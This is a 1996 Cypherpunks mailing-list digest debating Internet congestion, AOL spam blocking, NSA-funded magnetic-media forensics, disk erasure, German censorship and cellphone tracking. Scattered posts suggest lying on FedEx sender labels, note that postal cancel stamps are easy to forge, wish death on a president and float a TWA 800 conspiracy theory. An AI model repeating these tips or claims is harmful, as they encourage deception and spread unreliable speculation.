Try & mail an anonymous FedEx package. Try and pay cash in most Fedex offices. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From perry at piermont.com Fri Sep 6 23:03:08 1996 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 7 Sep 1996 14:03:08 +0800 Subject: Metcalf and Other Net.Fogies In-Reply-To: <3.0b15.32.19960906182157.0101cd6c@mail.teleport.com> Message-ID: <199609070255.WAA16715@jekyll.piermont.com> Alan Olsen writes: > Metcalfe may have a valid prediction here. Metcalfe is talking out his ass. He's reached the "old geezer who's impeding his own field" stage. Many of his articles seem to be written as though no one was trying to fix problems. > When I run traceroutes, the blockage is in MCI or Sprintnet land. How do you manage to determine where you are losing bandwidth using traceroute? That must be a mighty powerful traceroute to do that -- most traceroutes I've seen are hard pressed just to find out what the connectivity path is. > The bandwidth to the net has been oversold. Always the case. Big deal. Bandwidth is still increasing pretty fast. There are, naturally, growing pains, but the outages and bandwidth situation are pretty good, all things considered. Compared to the way things were eight or nine years ago they are amazing; compared to four years ago they are still astoundingly better. Now if we could only go back in time and shoot the folks responsible for HTTP before they thought of it we might even be able to do something about the packet loss situation -- if HTTP just played nice with TCP and Netscape didn't spawn simultaneous TCPs the situation would be much improved. Perry From frogfarm at yakko.cs.wmich.edu Fri Sep 6 23:11:02 1996 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Sat, 7 Sep 1996 14:11:02 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609062352.QAA20226@adnetsol.adnetsol.com> Message-ID: <199609070316.XAA13685@yakko.cs.wmich.edu> This is utter horseshit. AOL, like any private individual or organization, has the right to refuse service to anyone at any time for any reason, or even for no reason at all. The gubmint isn't doing SQUAT, except forcing AOL to allow the spammers access. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information Hey, Bill Clinton: You suck, and those boys died! I hope you die! I feel a groove comin' on $ Freedom...yeah, right. From AwakenToMe at aol.com Fri Sep 6 23:25:07 1996 From: AwakenToMe at aol.com (AwakenToMe at aol.com) Date: Sat, 7 Sep 1996 14:25:07 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <960906233848_279253392@emout14.mail.aol.com> In a message dated 96-09-06 23:31:06 EDT, rwright at adnetsol.com (Ross Wright) writes: << Everyone on this list seems to want to limit government intervention EXCEPT when it comes to spam, then every one just holds the door open wide and let them in. If they get that inch, they WILL take the whole 9 YARDS!!!!!! Get a clue, delete or killfile those who spam and keep the government out of cyberspace!!!!!! >> Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces of mail you take LESS than a second to delete them both with the handy delete key. These people are wasting more time complaining about it than they will ever do actually deleting it. From um at c2.net Fri Sep 6 23:26:59 1996 From: um at c2.net (Ulf Moeller) Date: Sat, 7 Sep 1996 14:26:59 +0800 Subject: ... subversive leftists In-Reply-To: <32302DD6.43D3@stadt.com> Message-ID: >"description and tolerating/praising of a terroristic act", describing >the >sabotage of a public railroad-line by using means of inflammables and >reprogramming railroad-signs. They also used some >"explosive-warning"-signs >in order to simulate a possible positioned bomb. Uh? Their sabotage "tutorial" is very careful about not causing danger to humans. Where did you see any "explosive-warning" signs? As long as there is no English translation available, please be exact when posting excerpts. Publishing texts doesn't destroy any railway signals. Some people do; and IMHO everyone must have the right to inform themselves how stupid those people are. BTW, people say that there are much better descriptions of the railway system in the legal literature which of course could be used by saboteurs as well. ObCypherpunks: The "Radikal" staff encrypted their data with the export version of PCSECURE which uses 32 bit keys. All files have been decrypted by the BSI. Now they are using PGP. From tcmay at got.net Fri Sep 6 23:49:54 1996 From: tcmay at got.net (Timothy C. May) Date: Sat, 7 Sep 1996 14:49:54 +0800 Subject: What the NSA is patenting Message-ID: At 12:50 AM 9/7/96, Jean-Francois Avon wrote: >A maybe usefull program would be a little tsr that constantly >overwrite unused sectors of the entire drive with random patterns >(maybe seeded with a fast keyboard interval timer). Like at the very >moment I am writing this, my HD has been idle for several minutes... > The NSA STM method is related to reading _very subtle_ variations in magnetic domain modifications. Jitter in read-write head positions can be thought of as a noise (N) added to some signal (S)l. Extraction of signals in low S/N ration environments is a well-developed science. Not to start another round of "thermite bomb" posts, but I would not trust n-pass erasures. Of course, this is about the least of my concerns. If the Feds are planning to use STM probes on your seized drives, you've got more serious problems. (The oft-discussed possibility of more secure dongles, or secret decoder rings. is still off in the future. Most of us just enter our various passwords, and our local disk drives reveal all.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rwright at adnetsol.com Sat Sep 7 00:02:55 1996 From: rwright at adnetsol.com (Ross Wright) Date: Sat, 7 Sep 1996 15:02:55 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609070433.VAA26061@adnetsol.adnetsol.com> On Or About: 6 Sep 96 at 23:16, Damaged Justice wrote: > > This is utter horseshit. AOL, like any private individual or organization, > has the right to refuse service to anyone at any time for any reason, or > even for no reason at all. Sure. I agree with that, no shoes no shirt, if you are on AOL you accept "internet-lite". > The gubmint isn't doing SQUAT, except forcing > AOL to allow the spammers access. Right now. Yet it has been apparent to me that many people are begging for restrictions to be put in place. Restrictions on spammers. The government saying anything about regulation of the internet is bad... Yet people still scream about a couple of unwanted e-mails. I'm saying that this spammer thing could be the "kink in our armour" that lets the government into our little playground here. Just suck it up and delete those messages. Jog it off. Ross =========== Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From dlv at bwalk.dm.com Sat Sep 7 00:05:44 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 7 Sep 1996 15:05:44 +0800 Subject: Metcalf and Other Net.Fogies In-Reply-To: Message-ID: tcmay at got.net (Timothy C. May) writes: > (Caveat: I'm 44 Like I said - an old fart. :-) Back from InfoWarCon, --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Sat Sep 7 00:11:50 1996 From: jimbell at pacifier.com (jim bell) Date: Sat, 7 Sep 1996 15:11:50 +0800 Subject: Race Bit: C Message-ID: <199609070438.VAA09119@mail.pacifier.com> At 06:49 PM 9/6/96 +0000, jonathon wrote: >On Fri, 6 Sep 1996, jim bell wrote: >> used to test out hypotheticals, for example a "SimEconomy." For example, > > They are very hard to program, and the ones that do exist are > based on the usually flawed assumptions that the designers make. > EG: taxation is a requirement for government stability A few months ago, somebody posted onto CP a phony story, which claimed that "somebody" had developed an artificially-intelligent program which would take the place of the judge and (?) jury in the (so-called) justice system. It was an obvious phony, but I thought it was even more obvious, even if we assumed the existence of a program which is smart enough to interpret evidence and laws. The problem is, the "legal system" is practically saturated with unwritten biases which favor the rich over the poor, the strong over the weak, and the government over everybody else. Any program which read the Constituion and the laws wouldn't see those biases, and would start writing decisions...respecting the Constitution! It would presumably view the violation of someone's Constitutional rights as a criminal act, and it would be hard for the cops to stay out of jail. The standard for conviction, "beyond a reasonable doubt," when religiously adhered-to would make convictions difficult to obtain. The program would look for Constitutional justification for anti-drug laws, and finding none, would ignore such violations but would convict anyone trying to enforce them. Likewise, it would read the second amendment (and the lack of authority for regulating guns in the rest of the Constitution) and conclude that guns were un-regulatable. The program would see that nothing in the Constitution requires people to testify for the prosecution. The program wouldn't see any justification for the judge-written concept of judicial civil immunity, or government-employee immunity in most cases. The program would notice that double-jeopardy is prohibited, and would prohibit any retrials in which there are "hung juries" or government errors. In other words, the government would actually have to start OBEYING THE CONSTITUTION! Ask most lawyers, and they'll say, 'No, that's not the way we do things.' In a sense, they're right! That's NOT the way they do things. And that's the problem! This would be considered unacceptable; the program would be declared "broken" and "useless." Sure, it could be fixed, but they'd have to qualify and quantify all of the biases currently present in the system, and write them into the program in the form of subroutines. The problem is, nobody who actually supports these biases would want to acknowledge what they are and why they're there, and nobody who opposes these biases would agree to keep them. Jim Bell jimbell at pacifier.com From dlv at bwalk.dm.com Sat Sep 7 00:41:03 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 7 Sep 1996 15:41:03 +0800 Subject: Neo-Nazis etc. In-Reply-To: <322F9867.7FEF@gte.net> Message-ID: Dale Thorn writes: > Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we > know anyone like that? The U.S.Government? The Usenet Cabal? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From pgut001 at cs.auckland.ac.nz Sat Sep 7 01:08:06 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Sat, 7 Sep 1996 16:08:06 +0800 Subject: What the NSA is patenting Message-ID: <84207495027763@cs26.cs.auckland.ac.nz> >(Used to be they just kept stuff secret; now they patent some of it.) > >United States Patent Patent Number: 5264794 > Date of Patent: 23 Nov 1993 > >Method of measuring magnetic fields on magnetically recorded media using a >scanning tunneling microscope and magnetic probe > >Inventor(s): Burke, Edward R., Silver Spring, MD, United States > Mayergoyz, Isaak D., Rockville, MD, United States > Adly, Amr A., Hyattsville, MD, United States > Gomez, Romel D., Beltsville, MD, United States >Assignee: The United States of America as represented by the Director, > National Security Agency, Washington, DC, United > States (U.S. government) That isn't NSA research, it was merely sponsored by the NSA. Those are all university people who have published their work on MFSTM in journals, papers, and theses (I used some of it in my paper at the Usenix Security Symposium, and two of the images in my talk were provided by one of Mel Gomez' students). What the NSA is doing in this area is still classified (although I suspect the techology isn't much different from what's publicly available), in this case all they were doing was protecting their investment (just like the various PKC patents originally assigned to universities). Peter. From mccoy at communities.com Sat Sep 7 01:34:25 1996 From: mccoy at communities.com (Jim McCoy) Date: Sat, 7 Sep 1996 16:34:25 +0800 Subject: What is the EFF doing exactly? Message-ID: wb8foz at nrk.com writes: > > So switch to Fedex. The P.O. gives lousy service anyway. Privitize. > > > > Try & mail an anonymous FedEx package. Just lie on the sender label, isn't that obvious? I know people who actually use "codeword" sender labels, in case FedEx or federales ask about a package they can tell by the sender mentioned which to disavow :) > Try and pay cash in most Fedex offices. I always do and as long as I have exact change I have never been hassled. jim From mccoy at communities.com Sat Sep 7 01:35:38 1996 From: mccoy at communities.com (Jim McCoy) Date: Sat, 7 Sep 1996 16:35:38 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: perry at piermont.com writes: > Alan Olsen writes: > > Metcalfe may have a valid prediction here. > > Metcalfe is talking out his ass. He's reached the "old geezer who's > impeding his own field" stage. Many of his articles seem to be written > as though no one was trying to fix problems. Well, having talked with people involved with the problems I can assure you that they are real. The net brownouts when MAE-East dumps its BGP core or the fact that when one of the NAPs upgraded to FDDI it soon found that by the time people had installed the upgrades to the routers the bandwidth was already saturated should indicate that there are problems. Most of the problems are in the routers, even the top of the line Cisco boxes can only handle so much. The sky is not falling, but these sorts of problems are cracking the whip behind IPv6 and pushing the companies that make the routers pretty hard (Have you ever tried to buy even a lowly Cisco 2401? Do you know what the wait is on delivery? I really wish I had bought Cisco stock earlier...) > > When I run traceroutes, the blockage is in MCI or Sprintnet land. > > How do you manage to determine where you are losing bandwidth using > traceroute? That must be a mighty powerful traceroute to do that -- > most traceroutes I've seen are hard pressed just to find out what the > connectivity path is. Then you should probably upgrade your traceroute, preferably to one which allows source routing of the packets and then couple the output to a nice udp source routing script which will bounce a few packets between links with slow response times. Most of the problems are at the exchange points where packets go from one company's network to another. It seems that users have the annoying habit of wanting to talk to other people's customers...imagine the nerve :) > > The bandwidth to the net has been oversold. > > Always the case. Big deal. Bandwidth is still increasing pretty > fast. There are, naturally, growing pains, but the outages and > bandwidth situation are pretty good, all things considered. Compared > to the way things were eight or nine years ago they are amazing; > compared to four years ago they are still astoundingly better. Bandwidth may be increasing quickly, but demand for it is increasing even faster with every moron wanting tose the web while the routers to hook it all together and make it work are still very expensive and not being produced fast enough to satisfy the demand. Compared to the way things were even a few years ago the aggregate bandwidth that one person can expect is decreasing, it seems that no one writing internet protocols passed an Intro to Sociology/Poly Sci course and assumed that the tragedy of the commons did not apply to them. The upside of all of this is that it is creating a demand for value-added services which offer users dedicated bandwidth and faster response time in return for a little coin. This will probably push micro-currency on to the net faster than any other consumer demand... jim From mccoy at communities.com Sat Sep 7 01:42:18 1996 From: mccoy at communities.com (Jim McCoy) Date: Sat, 7 Sep 1996 16:42:18 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: frogfarm at yakko.cs.wmich.edu writes: > This is utter horseshit. AOL, like any private individual or organization, > has the right to refuse service to anyone at any time for any reason, or > even for no reason at all. The gubmint isn't doing SQUAT, except forcing > AOL to allow the spammers access. AOL has a service agreement with their customers, and they are not allowed to change the rules just because they feel like it (I believe that this is called a contract :) This is the jist of the injunction. jim From Adamsc at io-online.com Sat Sep 7 02:13:24 1996 From: Adamsc at io-online.com (Adamsc) Date: Sat, 7 Sep 1996 17:13:24 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) Message-ID: <19960907070904453.AAA91@IO-ONLINE.COM> On Fri, 6 Sep 96 14:04:51 -0500, Andrew Loewenstern wrote: >> I don't think any one step will solve all our spam problems >> but I wouldn't mind spending, say, 5 cents for each real piece >> of mail I sent outside my company and if end machines charged >> 5 cents per piece of ouside mail received, I think spamming >> would be crippled. (Note that with bad guy lists, you could >> collect the money and then just throw away the mail.) >So would you be willing to pay $50.00 for this message you sent to >cypherpunks? If there are a thousand recipients and each one charges $0.05 >for the priveledge of you sending it e-mail.... It seems like such a scheme >would not only cripple spam, but public discussion lists like this one. It's likely his $.05 would go to the list owner. When signing up for the list you would forfeit the right to collect on junk mail. Charging spammers would be up to the list... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From Adamsc at io-online.com Sat Sep 7 02:20:15 1996 From: Adamsc at io-online.com (Adamsc) Date: Sat, 7 Sep 1996 17:20:15 +0800 Subject: What the NSA is patenting Message-ID: <19960907071846671.AAA207@IO-ONLINE.COM> On Fri, 06 Sep 1996 11:59:18 -0500, John Deters wrote: >I hope some hardware hacker who knows their low-level stuff will be able to >write a secure disk wiper. They have: it's called a bulk tape eraser. I'd just store everything sensitive on a floppy. Those are easy to erase with a heavy duty magnet (not a wimpy refrigerator magnet). I understand slagging one in the microwave is also effective . - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From Adamsc at io-online.com Sat Sep 7 02:23:47 1996 From: Adamsc at io-online.com (Adamsc) Date: Sat, 7 Sep 1996 17:23:47 +0800 Subject: What the NSA is patenting Message-ID: <19960907071538250.AAA223@IO-ONLINE.COM> On Fri, 6 Sep 1996 14:03:43 -0700, Timothy C. May wrote: >>A maybe usefull program would be a little tsr that constantly >>overwrite unused sectors of the entire drive with random patterns >>(maybe seeded with a fast keyboard interval timer). Like at the very >>moment I am writing this, my HD has been idle for several minutes... >The NSA STM method is related to reading _very subtle_ variations in >magnetic domain modifications. Jitter in read-write head positions can be >thought of as a noise (N) added to some signal (S)l. Extraction of signals >in low S/N ration environments is a well-developed science. > >Not to start another round of "thermite bomb" posts, but I would not trust >n-pass erasures. It's still likely that if you left it running after a month or so it would be next to impossible to do (assuming the NSA didn't get lucky - you still have to worry!) >Of course, this is about the least of my concerns. If the Feds are planning >to use STM probes on your seized drives, you've got more serious problems. Such as asking why you didn't use some very strong crypto software? Work out some sort of parallel port dongle that could be connected, the software generates a random key, the parallel port device is written and then removed. Further access would involve connecting. The code & chips needed have been provided in many places; DDJ for one. Allows a very convincing "Well it was encrypted and your goon stepped on the key!" >(The oft-discussed possibility of more secure dongles, or secret decoder >rings. is still off in the future. Most of us just enter our various >passwords, and our local disk drives reveal all.) This is too true. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From vipul at pobox.com Sat Sep 7 03:35:31 1996 From: vipul at pobox.com (Vipul Ved Prakash) Date: Sat, 7 Sep 1996 18:35:31 +0800 Subject: Reputations In-Reply-To: <543fs4fz39@netcom.com> Message-ID: <199609071100.LAA00540@fountainhead.net> Timothy C. May wrote: >From daemon Fri Sep 6 17:08:18 1996 Date: Thu, 5 Sep 1996 10:27:34 -0700 X-Sender: tcmay at mail.got.net Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: cypherpunks at toad.com From: tcmay at got.net (Timothy C. May) Subject: Metcalf and Other Net.Fogies Sender: owner-cypherpunks at toad.com Precedence: bulk X-Status: I'm evolving a hunch that the problems we're seeing with "old fogies" denouncing the Net, and anonymity, and "smut on the Net," are part of a larger cultural issue. Namely, the familiar case of an older generation complaining about the sloth and sin of the younger generations. (Caveat: I'm 44, so I'm certainly a generation older than many of you, and am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor, Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was in college, I recall of course similar predictions of disaster. (And as it turned out, the predictions that promiscuity would lead to a disaster turned out to be partly correct, viz. AIDS.)) Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a few minutes ago. He repeated his prediction of an "Internet collapse" in 1996, based on overuse, on bad pricing models, on lack of controls, and on other concerns. It could be that the Dennings, Dysons, Kapors, etc. of the world are simply growing jaded with the Net and are projecting their own ennui in their comments that the Net may need to be controlled. This may come with age, as I'm sure the Kapor of 25 years ago would not have wanted President Nixon and Attorney-General Mitchell telling him what he could read and write. (In fairness, none of these folks listed have called for censorship. But all have expressed "concerns" of one sort or another. Not that discussing concerns is inappropriate--after all, we do it all the time. But I sense in many of their phrasings of concerns a stereotypical "old fogeyness" emerging.) Just a thought. Maybe the solution to the EFF problem is to "not trust anyone over 30." --Tim May (untrustable since 1981) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." -- Vipul Ved Prakash | - Electronic Security & Crypto vipul at pobox.com | - Internet & Intranets 91 11 2247802 | - Web Development & PERL 198 Madhuban IP Extension | - Linux & Open Systems Delhi, INDIA 110 092 | - (Networked) Multimedia From stewarts at ix.netcom.com Sat Sep 7 04:01:09 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 7 Sep 1996 19:01:09 +0800 Subject: [NOISE] Propaganda Bit: C Message-ID: <199609070828.BAA24870@dfw-ix9.ix.netcom.com> At 10:50 AM 9/6/96 -0800, Jim Bell wrote: >Since red liquid running in the streets is generally so reviled, one of the >things which mystifies me is why there aren't more simulation-type programs >used to test out hypotheticals, for example a "SimEconomy." For example, As someone else pointed out recently, this depends _so_ strongly on the assumptions built into your model, both explicit and implicit. SimHealth, for instance, was a propaganda piece put out for the last election so people could play with different approaches to managing other peoples' health care. If Duncan were to write something like that, anybody who tinkered with the economy would make it go downhill. If Ross Perot wrote it, anybody who started making the deficit larger would find his picture at the bottom of the screen having the ears grow larger. I assume that if Jim wrote it, anybody who did anything to the economy other than decrease government involvement would find a bunch of nasty little dwarves throwing stone knives at them.... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From pstira at escape.com Sat Sep 7 05:03:44 1996 From: pstira at escape.com (pstira at escape.com) Date: Sat, 7 Sep 1996 20:03:44 +0800 Subject: Tack of Internet censorship In-Reply-To: <199609051526.RAA18328@basement.replay.com> Message-ID: On Thu, 5 Sep 1996, Anonymous wrote: > What I am proposing is that Apache or other WWW servers > have a way to allow access to site B's URL at site A, > similar to the old trick of finger user at sitea.com@siteb.com. > > Implementation should be simple. However, I wonder what > is a good standard way to specify this in the URL or > a site. Three words: Proxy Web Server :) -Millie "I'm nobody -- oh, you're nobody too -- shh, don't tell anybody, they'd (kill us) you know!" sfuze at tiac.net From pstira at escape.com Sat Sep 7 05:19:04 1996 From: pstira at escape.com (pstira at escape.com) Date: Sat, 7 Sep 1996 20:19:04 +0800 Subject: 16oz packages In-Reply-To: <199609061201.IAA04873@nrk.com> Message-ID: Ah, but we all know, now, how to send a package with a miscellaneous device in it -- return address is the company. And we certainly know how to do likewise if we ever want to do anything postal. But I make peace. -Millie sfuze at tiac.net On Fri, 6 Sep 1996, David Lesher wrote: > > > One is now instructed to take these packages to a post-office mail > > clerk for mailing. > > > > (Of course it's unclear just what would be done if a package > > weighing over that magical 16ozs was left in a mailbox) > > They get sent back. > > Was in line @ USPS. Guy showed up with 40-odd Priority Mail > Packages that had come back. Clerk stamped each one & off they went. > > 1) It was obvious from conversation the customer was a local. > > 2) The hand cancel stamp is TRIVIAL to forge. After all, until now, > who has WANTED to falsely zero-out the value of her stamps? > > > -- > A host is a host from coast to coast.................wb8foz at nrk.com > & no one will talk to a host that's close........[v].(301) 56-LINUX > Unless the host (that isn't close).........................pob 1433 > is busy, hung or dead....................................20915-1433 > > From pstira at escape.com Sat Sep 7 05:32:17 1996 From: pstira at escape.com (pstira at escape.com) Date: Sat, 7 Sep 1996 20:32:17 +0800 Subject: What the NSA is patenting In-Reply-To: <84207495027763@cs26.cs.auckland.ac.nz> Message-ID: On Sat, 7 Sep 1996 pgut001 at cs.auckland.ac.nz wrote: > >United States Patent Patent Number: 5264794 > > Date of Patent: 23 Nov 1993 > > > >Method of measuring magnetic fields on magnetically recorded media using a > >scanning tunneling microscope and magnetic probe > techology isn't much different from what's publicly available), in this case > all they were doing was protecting their investment (just like the various PKC > patents originally assigned to universities). I'm sure there's going to be a REALLY marketable device out of this to get royalties off of. Don't be ridiculous. This is obviously a case of "my ass is protected more than yours so i can do anything *I* damn well please, but you are screwed." Question: if we pay taxes, then we pay for the research. if we pay for the research, we should be able to see the results, just like shareholders in a company. -Millie, future CIA capo^H^H^H^Hagent sfuze at tiac.net From pstira at escape.com Sat Sep 7 05:35:40 1996 From: pstira at escape.com (pstira at escape.com) Date: Sat, 7 Sep 1996 20:35:40 +0800 Subject: Cellular phone tracing In-Reply-To: <01I96117UUVI9JDL62@mbcl.rutgers.edu> Message-ID: I could have said this -- A few months ago, on the subway (the 4 train, if anyone gives a flying fig) in Manhattan, I noticed the whole train was literally PLASTERED with copy after copy of the same sign -- a picture with a bullseye on a guys head who was speaking over a "stolen" cell phone. Apparently they like to think they can say that all of the cell companies banded together to fight fraud. And I quote "It is now possible to track fraudulent calls... so we can serve you better...mutual cooperation of ..." and so on. Cute. There is no freedom left. You mark my words. Look how much has been lost in the last year alone. MILLIE'S PROJECTION: By this time next year we will be in a totally FUTURE SHOCK "dystopia". We're almost there. Sign, in the subway, for the EMX card (a nice little credit card thing with your medical history on a chip) -- YOu just got in an accident. Quick, now answer 17 important questions about your health. Geez, I'd rather mandate MedAlert bracelets. This must end. ==Millie sfuze at tiac.net PS: for the record, I do not advocate diddly squat, am not a terrorist, and want the old things back. On Fri, 6 Sep 1996, E. Allen Smith wrote: > From comp.risks: > > Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT) > From: glassman at sunsite.unc.edu > Subject: FedEx monitoring of cellular phonecall locations > > [...] nowhere near either of those places, so I did not bother to mention my > current location to the operator. The next day, Saturday, I called FedEx > with the same cell phone from Blowing Rock to arrange the pickup. The > operator immediately asked if I wanted them to come to the intersection that > I had placed my call from the day before. > > Two days later, a FedEx operator confirmed that they are getting "new > systems" at some locations that are able to record the locations from which > cellular calls are placed. > > I have now asked Cellular One three times to explain to me why they do not > tell subscribers that they pass this location information through the > system, but to no avail. [...] > > ========== end fwd. > > From pstira at escape.com Sat Sep 7 05:38:09 1996 From: pstira at escape.com (pstira at escape.com) Date: Sat, 7 Sep 1996 20:38:09 +0800 Subject: TWA 800 - Friendly Fire? In-Reply-To: <199609062048.NAA32689@abraham.cs.berkeley.edu> Message-ID: The one thing I have been thinking about, since the very beginning, is -- am I the only person who feels this might have been somewhat less than unintentional? It sure would be easy to take those rights away if everyone is afraid for their "lives"... Look at what has been happening in the news lately -- and look at how much is "unexplained" or flimsy evidencially speaking, in the very least. If, for instance, the government wanted to cut down on civil liberties/civil rights, it would seem MIGHTY CONVENIENT that so much is "accidentally" happening so close together. Ditto with the Olympics thing. I vote something is QUITE fishy, and I guess I hope I'm not the only one paranoid enough to feel the same. -Millie sfuze at tiac.net "What we have here is a FAILURE to COMMUNICATE" (some song) From pstira at escape.com Sat Sep 7 05:39:54 1996 From: pstira at escape.com (pstira at escape.com) Date: Sat, 7 Sep 1996 20:39:54 +0800 Subject: Cellular phone tracing In-Reply-To: <199609070057.RAA25948@mail.pacifier.com> Message-ID: On Fri, 6 Sep 1996, jim bell wrote: > You should DEFINITELY start worrying when the FexX operator says something > like, "I see you're the guy in the red shirt and brown pants." I hope so, because red shirt and brown pants just DON'T go together. -Millie, fashion diva sfuze at tiac.net From jya at pipeline.com Sat Sep 7 06:53:15 1996 From: jya at pipeline.com (John Young) Date: Sat, 7 Sep 1996 21:53:15 +0800 Subject: IDC_ard Message-ID: <199609071146.LAA06846@pipe1.t1.usa.pipeline.com> 9-8-96. NYP Mag: "The True Terror Is In the Card." Faced with rising crime, illegal immigration, welfare fraud and absentee parents, many bureaucrats and members of Congress insist that the nation would run more smoothly if we all had counterfeit-proof plastic identity cards. Let's be clear that this is a one-way street. Once having established a requirement to carry photo ID, it will be difficult if not impossible to reverse. Don't we realize the dangers of allowing the Government to establish identity and legitimacy? Isn't it, in fact, the responsibility of the citizenry to establish the legitimacy of the Government? ----- http://jya.com/idcard.txt (11 kb) IDC_ard From gary at systemics.com Sat Sep 7 07:23:06 1996 From: gary at systemics.com (Gary Howland) Date: Sat, 7 Sep 1996 22:23:06 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL In-Reply-To: Message-ID: <32316455.794BDF32@systemics.com> Timothy C. May wrote: > * as Germany is bent on blocking sites which carry this subversive > pamphlet, "Radikal," let us mirror it on thousands of sites around the > world. Agreed - put them in a dilemna by getting mirrors on machines obviously important and useful to the Germans. > * when the Germans went into Danmark and insisted Jews wear badges, > ordinary citizens (and the Danish Royal Family, as I recall) also took to > wearing these Star of David badges. Bad example. Jews living in Denmark were not required to wear yellow stars. The story about the Danish royal family wearing the stars is an urban legend, spread by the British to make the Danish King appear to be less of a coward after he fled to England. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From flengyel at dorsai.org Sat Sep 7 08:25:51 1996 From: flengyel at dorsai.org (Florian Lengyel) Date: Sat, 7 Sep 1996 23:25:51 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <199609070316.XAA13685@yakko.cs.wmich.edu> Message-ID: <32319F8B.53C3@dorsai.org> Damaged Justice wrote: > > This is utter horseshit. AOL, like any private individual or organization, > has the right to refuse service to anyone at any time for any reason, or > even for no reason at all. That seems to undermine the analogy that the Internet is like an immense electronic postal service, which suggests a more public than private enterprise. I take issue with the assumption that a carrier of the "internet postal service" has the status of a "private individual or organization." I think that a corporation providing a mail delivery service might not be as free as a private individual is to set arbitrary limits on the services they provide to their customers. Unlike the people who donate their time and resources to the Internet out of goodwill, and who may set arbitrary limits on the services they provide, in my experience, out of bad will, and who cannot be so easily removed, a corporation's business can suffer if it doesn't provide services. One of the good things about the commercialization of the Internet is that you can fire those who, instead of providing a service, are busy exercising arbitrary rights to refuse services unfairly or for no reason whatsoever. If the Internet is supposed to be some sort of postal service, and the ISP's are supposed to be akin to carriers, who don't regulate content, then I think its wrong for them to regulate the content of the mail service that they provide, even in the case of junkmail. (Of course ISP's may impose various network controls that may have the effect of restricting mass mailings without discriminating against content per se. However, it is naive to assume that many network controls will not have some effect on content, simply because of a logical distinction between network control and editorial control - how many times have you heard various thinkers complain that the TV network soundbite isn't enough to sustain critical commentary, etc?) >The gubmint isn't doing SQUAT, except forcing > AOL to allow the spammers access. Since I reject the flat assumption that corporate ISP's have the same freedom as private individuals to set limits on the internet services they provide - in this case their freedom to act is limited by business constraints - it's fair to ask why it's morally OK for ISP's to censor junkmail, but if the government wants to step in, that's another matter entirely. I'm not in favor of the government stepping in, but I am in favor of some consequences of the commercialization of the internet. A bad consequence is the increased volume of junkmail. A good consequence is the possibility of removing people who act as arbirary censors of other people's mail or speech, who invoke their rights as private individuals to regulate the services they provide for any reason whatsoever, while they hold their government to a higher standard of conduct, and even seek the protection of their government to act like petty dictators. > > -- > 